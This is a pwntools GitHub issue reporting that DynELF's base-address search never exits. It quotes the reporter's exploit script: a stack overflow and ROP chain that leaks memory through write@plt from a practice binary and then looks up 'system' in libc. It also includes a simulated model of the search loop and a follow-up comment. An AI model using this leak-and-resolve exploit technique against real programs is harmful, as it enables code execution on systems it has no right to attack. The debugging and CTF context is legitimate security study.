DynELF cannot break the endless loop in dynelf.py #1418

Open
Kiprey opened this issue Jan 29, 2020 · 1 comment
Labels
mystery This is really suspicious and probably related to something totally unrelated

Comments


Kiprey commented Jan 29, 2020

This is my code:

from pwn import *

p = process("./pwn1_64")
e = ELF("pwn1_64")

plt_write_addr = e.plt["write"]
start_addr = e.symbols["vulnerable_function"]
pop_rsi_rdx_rdi_addr = 0x40053b  # gadget: pop rsi; pop rdx; pop rdi; ret

def leak(address):
    # Overflow the 136-byte buffer, call write(1, address, 4), then return into
    # vulnerable_function so that DynELF can issue the next leak.
    payload1 = b"a" * 136  # bytes literal so the concatenation below works on Python 3
    payload1 += p64(pop_rsi_rdx_rdi_addr) + p64(address) + p64(4) + p64(1)
    payload1 += p64(plt_write_addr)
    payload1 += p64(start_addr)
    p.sendline(payload1)
    data = p.recv()  # DynELF expects the bytes stored at `address`
    return data

dyn_elf = DynELF(leak, elf=e)
system_addr = dyn_elf.lookup("system", "libc")

When I execute this line,

dyn_elf = DynELF(leak, elf=e)

the program is stuck.
So I tried to debug and went into dynelf.py, discovering that
in class DynELF, function _find_base,

def _find_base(self, ptr):
    page_size = 0x1000
    page_mask = ~(page_size - 1)

    ptr &= page_mask
    w = None

    while True:
        if self.leak.compare(ptr, '\x7fELF'):
            break

        # See if we can short circuit the search
        fast = self._find_base_optimized(ptr)
        if fast:
            ptr = fast
            continue

        ptr -= page_size

        if ptr < 0:
            raise ValueError("Address is negative, something is wrong!")

        # Defer creating the spinner in the event that 'ptr'
        # is already the base address
        w = w or self.waitfor("Finding base address")
        self.status('%#x' % ptr)

    # If we created a spinner, print the success message
    if w:
        self.success('%#x' % ptr)

    return ptr

the condition for breaking the loop is never met.

I don't know why. But I found something interesting.
When I was debugging, I once tried to run my Python script in the console line by line.
I mean, after one line of code was executed in the Python interpreter, I typed the next line into the console and waited for it to be executed, too.

When I input
dyn_elf = DynELF(leak, elf=e)
it's no surprise that the program got stuck.
So, I pressed Ctrl+C to stop this code.

But when I input the same code to try again,
the program didn't get stuck at all! But it seems to work very badly.

Here are the screenshots.
[two screenshots of the interpreter session, not preserved in this copy]

I don't know why, either. But I hope this situation can help you.
This is my pwn file.
pwn1_64.zip
I hope it can help you, too!

My English is a little poor; I hope it didn't disturb you.
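The loop quoted above only terminates when `leak.compare(ptr, '\x7fELF')` succeeds, that is, when the leak callback returns exactly the bytes stored at the requested address. The following is an added example, not pwntools' own code and not from the reporter: a simplified re-implementation of the page-walk search, run against a constructed in-memory image (`FAKE_MEMORY`, with an ELF header at the assumed address 0x400000) instead of a live process, so the termination condition can be studied offline. `make_leak` can also be told to prepend stray bytes, simulating a leak function that returns more than the requested word, and `find_base` bounds the walk so such a leak produces an error instead of the endless loop described in the report.

```python
# Added example: simplified model of DynELF._find_base (not the pwntools source).
PAGE_SIZE = 0x1000
PAGE_MASK = ~(PAGE_SIZE - 1)
ELF_MAGIC = b"\x7fELF"

# Constructed memory image: one page holding an ELF header at an assumed base.
# Every other page reads back as zeros.
FAKE_BASE = 0x400000
FAKE_MEMORY = {FAKE_BASE: ELF_MAGIC + b"\x02\x01\x01" + b"\x00" * 9}


def make_leak(memory, extra_prefix=b""):
    """Return a leak(address) callable backed by the constructed `memory`.

    `extra_prefix` simulates a leak function whose recv() also picks up bytes
    that are not part of the leaked word (for example a prompt printed by the
    target), which is what a DynELF compare never matches against.
    """
    def leak(address):
        page = address & PAGE_MASK
        data = memory.get(page, b"\x00" * 16)
        offset = address - page
        return extra_prefix + data[offset:offset + 4]
    return leak


def compare(leak, address, expected):
    """Model of leak.compare(): do the leaked bytes at `address` start with `expected`?"""
    data = leak(address)
    return data[:len(expected)] == expected


def find_base(leak, ptr, max_pages=64):
    """Walk downward one page at a time until an ELF header is found.

    Unlike the loop quoted from dynelf.py this version gives up after
    `max_pages` pages, so a leak that never yields the magic bytes raises
    instead of spinning forever.
    """
    ptr &= PAGE_MASK
    for _ in range(max_pages):
        if compare(leak, ptr, ELF_MAGIC):
            return ptr
        ptr -= PAGE_SIZE
        if ptr < 0:
            raise ValueError("Address is negative, something is wrong!")
    raise RuntimeError(
        "no ELF header within %d pages; check that leak() returns exactly "
        "the bytes at the requested address" % max_pages
    )


if __name__ == "__main__":
    good = make_leak(FAKE_MEMORY)
    print("base found at %#x" % find_base(good, 0x401a10))
    bad = make_leak(FAKE_MEMORY, extra_prefix=b"> ")
    try:
        find_base(bad, 0x401a10)
    except RuntimeError as err:
        print("bounded search stopped:", err)
```

With a correct leak the walk starts at 0x401000, misses, steps to 0x400000 and stops. With two stray bytes in front of every leaked word the comparison can never match, which is the behaviour that keeps the unbounded loop in dynelf.py running; the bounded version surfaces it as an error that points at the leak function.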


ioxera commented May 27, 2021

Similar to the above, I encountered a problem in which the dynelf function could not jump out of the loop and caused a memory leak, resulting in the POC process being killed by the system.
My pwntools version is V4.5.0.

Arusekk added the "mystery" label on May 27, 2021.